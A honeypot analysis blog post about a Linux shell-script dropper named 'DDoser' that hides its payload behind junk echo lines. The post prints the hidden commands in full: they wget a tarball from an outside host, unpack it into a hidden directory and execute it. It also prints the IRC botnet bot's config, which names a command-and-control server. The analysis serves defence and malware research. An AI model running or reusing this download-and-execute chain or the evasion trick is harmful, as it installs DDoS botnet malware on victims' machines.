This piece of malware was dropped onto my Linux honeypot simply named "DDoser".
The file has a 0% detection rate. Interesting.
This appears to simply be a Linux/UNIX shell script.
It starts with the following line repeated multiple times:
echo "2e61e112030709378914f8280fd09f62e
61e112030709378914f8280fd09f62e61e11203
0709378914f8280fd09f62e61e1120307093789
14f8280fd09f62e61e112030709378914f8280f
d09f6"
And ends with the following lines:
clearAn echo powered DDoS script? That doesn't make sense...
echo
echo "**********************************************"
echo "The Installation Of D3v1Lz T34m Ddoser"
echo "Should Be Running Now On D3v1Lz Ircds"
echo
echo "Make Sure That Ddoser Is Running - Use This Command:"
echo "ps x"
echo
echo "If You See 'addict' Listed, Then It's Running."
echo "You Can Then Fuck Ips Randomly On Your Botnets."
echo "**********************************************"
echo
echo "Enjoy Our Best Services At WebShells Co. , For More"
echo "Info Contact Us On Tech@WShells.Ws Or Call Us On 03-50 12 10"
echo "More Info About Script: Chadi@WShells.Ws"
exit 0
fi
A closer inspection reveals the true nature of this file...
After repeating the "garbage" echo line multiple times, the following code executes:
#!/bin/shThe file DvLz-T34m.tar.gz has a 37% detection rate through generic detections...
clear
wget http://d3v1lz.at.ua/DvLz-T34m.tar.gz
tar -zxvf DvLz-T34m.tar.gz
rm -rf DvLz-T34m.tar.gz
killall -9 addict
mv DvLz-T34m .dt
chmod +x .dt
cd .dt
chmod +x *
./start.sh
clear
cd
rm -rf DvLz-T34m
This script downloads and installs an apparent DDoS trojan which reports to an IRC command and control center...
File "mech.set"
NICK DvLzSo why did the hacker use this script to install the malware, instead of simply directly downloading the malware and installing him/herself?
USERFILE user
CMDCHAR .
LOGIN DvLz
IRCNAME D3v1Lz T34m Dd0ser
MODES +ixws
TOG CC 1
TOG CLOAK 1
TOG SPY 1
SET OPMODES 4
SET BANMODES 6
SET AAWAY 1
TOG NOIDLE 1
CHANNEL #Ddos
TOG PUB 1
TOG MASS 1
TOG SHIT 1
TOG PROT 1
TOG ENFM 1
SET ENFM +nstm
SET MDL 4
SET MKL 4
SET MBL 4
SET MPL 1
server slain.wshells.ws 6667
One possibility is to avoid automated analysis by honeypots. By uploading a script to the honeypot, instead of the malware itself, any antivirus scans would have ignored the script file. Furthermore, by burying the script hidden within multiple "garbage" echo lines, the script has the possibility to avoid detection by automated and manual analysis.
With that said, both files have been submitted to AV vendors for analysis and inclusion in their detection signatures.
To the hacker who uploaded this malware to my honeypot...thanks for the early Christmas present!
I'm sorry to say all you're getting is a lump of coal. And a letter to your ISP.
No comments:
Post a Comment